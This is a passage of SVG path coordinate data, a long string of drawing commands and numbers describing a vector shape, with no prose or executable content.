6,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6